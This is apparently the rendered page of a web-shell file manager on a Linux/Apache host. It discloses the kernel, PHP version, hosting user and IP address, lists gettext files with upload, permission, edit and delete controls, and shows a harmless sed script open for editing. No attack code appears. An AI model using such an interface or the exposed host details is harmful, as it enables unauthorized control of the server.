[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
share
/
gettext
/
po
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 Makefile.in.in
17,577 B
SET
[ EDIT ]
|
[ DEL ]
📄 Makevars.template
3,376 B
SET
[ EDIT ]
|
[ DEL ]
📄 Rules-quot
2,203 B
SET
[ EDIT ]
|
[ DEL ]
📄 boldquot.sed
217 B
SET
[ EDIT ]
|
[ DEL ]
📄 en@boldquot.header
1,337 B
SET
[ EDIT ]
|
[ DEL ]
📄 en@quot.header
1,203 B
SET
[ EDIT ]
|
[ DEL ]
📄 insert-header.sin
672 B
SET
[ EDIT ]
|
[ DEL ]
📄 quot.sed
153 B
SET
[ EDIT ]
|
[ DEL ]
📄 remove-potcdate.sin
432 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: remove-potcdate.sin
# Sed script that remove the POT-Creation-Date line in the header entry # from a POT file. # # The distinction between the first and the following occurrences of the # pattern is achieved by looking at the hold space. /^"POT-Creation-Date: .*"$/{ x # Test if the hold space is empty. s/P/P/ ta # Yes it was empty. First occurrence. Remove the line. g d bb :a # The hold space was nonempty. Following occurrences. Do nothing. x :b }